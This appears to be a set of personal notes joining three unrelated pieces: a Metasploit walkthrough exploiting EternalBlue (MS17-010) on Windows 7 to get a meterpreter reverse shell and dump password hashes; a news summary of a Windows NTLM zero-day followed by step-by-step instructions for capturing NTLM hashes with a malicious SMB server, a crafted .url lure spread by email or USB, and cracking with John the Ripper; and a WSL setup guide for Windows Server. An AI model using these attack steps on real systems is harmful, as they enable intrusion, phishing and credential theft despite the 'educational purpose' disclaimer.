Playing with Exploitation (Windows 7 7601 SP1, SMB)

(This is for educational purpose, Hacking is bad, Don’t hack)

Using Kali Linux

Recon Phase

Use nmap

Simple Scan 
nmap -A IP

Aggressive Scan
nmap --script-args vulscan -sSV -A IP -T3

We are able to identify that the host machine and whatever ports and services, versions are so on
For SMB look for port 445, we know that the OS is Windows 7 7602 SP1.

Search for vulnerabilities

Google the service to look for vulnerabilities to exploit, exploit ms17_010, eternal blue found.

Exploit using Metasploit

To start Metasploit

service postgresql start
msfconsole

search ms17_010

Look for auxiliary/scanner/smb/smb_ms17_010

use #
show options

Fill up option accordingly

Things to remember
rhost refers to remost host IP
lhost referes to local host IP

run

If the return is likely vulnerable, time to attack
back and look for the exploit exploit/windows/smb/ms17_010_eternalblue

back
search ms17_010
use #
show options

Fill up option accordingly

See things to remember +
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LPORT 4444
exploit

Output meterpreter

hashdump

Decrypt hash using john the ripper or hashcat

New Windows zero-day exposes NTLM credentials

A new zero-day vulnerability has been discovered that allows attackers to capture NTLM credentials by simply tricking the target into viewing a malicious file in Windows Explorer.

The flaw was discovered by the 0patch team, a platform that provides unofficial support for end-of-life Windows versions, and was reported to Microsoft. However, no official fix has been released yet.

According to 0patch, the issue, which currently has no CVE ID, impacts all Windows versions from Windows 7 and Server 2008 R2 up to the latest Windows 11 24H2 and Server 2022.

The default port for NTLM authentication is port 445, which is primarily used for SMB (Server Message Block) communication. If this port is open and accessible, attackers can exploit NTLM credential leaks, especially in untrusted network environments. This could allow unauthorized access to sensitive systems and, when combined with other attack vectors, enable further actions such as lateral movement or establishing command-and-control (C&C) infrastructure. Therefore, securing port 445 is critical to mitigate such risks.

https://www.bleepingcomputer.com/news/security/new-windows-zero-day-exposes-ntlm-credentials-gets-unofficial-patch/

Exploit that might work. (this is for educational purpose, hacking is bad, don’t hack)

1. Set Up the Metasploit Listener

Start Metasploit:

msfconsole

Use the auxiliary module to create a malicious SMB server:

use auxiliary/server/capture/smb
set SRVHOST <your_attack_machine_IP>
set SRVPORT 445
set JOHNPWFILE /tmp/hashes.john
set CHALLENGE 1122334455667788
run

This creates an SMB server to capture NTLMv2 hashes when a Windows user connects to it.

2. Create a Malicious File

Craft a file containing a link to your SMB server. For example:

[InternetShortcut]
URL=file:///fake

Save the file as something enticing, e.g., ReadMe.url.

3. Host or Distribute the Malicious File

  • Email the malicious .url file to the victim.
  • Host it on a shared drive or external USB.
  • Use social engineering to trick the user into opening the file.

4. Capture NTLM Hashes

Monitor your Metasploit or Responder console for NTLM hash captures.

5. Crack NTLM Hashes

Use John the Ripper to crack captured hashes:

john /tmp/hashes.john --wordlist=/usr/share/wordlists/rockyou.txt

Defensive Measures:

  • Disable NTLM authentication on Windows systems.
  • Regularly apply Windows updates.
  • Use SMB signing to mitigate NTLM relay attacks.

Adding in WSL into Hyper-V VM in Windows Server

Default Windows OS doesn’t allow hyperV feature to be enabled in VM

Create nested Hyper-V

  1. Shut down the VM.
  2. In the host open Powershell with administrator rights.

    Set-VMprocessor ExposeVirtualizationExtension $true
    VMName
  3. Turn on VM.

Installation

  1. Open PowerShell with administrator rights

    Hyper-V is requirement for WSL installation
    Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All

    Enable WSL
    Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
  2. Windows server does not have Microsoft store, we will have to download the distribution files.
    https://learn.microsoft.com/en-us/windows/wsl/install-manual#downloading-distributions
  3. Extract the .appx package’s contents, using PowerShell:

Copy-Item .\Ubuntu.appx .\Ubuntu.zip
Expand-Archive .\Ubuntu.zip .\Ubuntu

Add-AppxPackage .\app_name.appx

Add your Linux distribution path to the Windows environment PATH
$userenv = System.Environment::GetEnvironmentVariable("Path", "User")
[System.Environment]::SetEnvironmentVariable("PATH", $userenv + ";C:\Users\Administrator\Ubuntu", "User")

You can now launch your distribution from any path by typing .exe. For example:
ubuntu.exe.

After launching the ubuntu.exe you might encounter Kernel error. WslRegisterDistribution failed with error: 0x800701bc,

link to package https://learn.microsoft.com/en-us/windows/wsl/install-manual

Reference

https://learn.microsoft.com/en-us/windows/wsl/install-on-server

https://learn.microsoft.com/en-us/windows/wsl/install-manual#downloading-distributions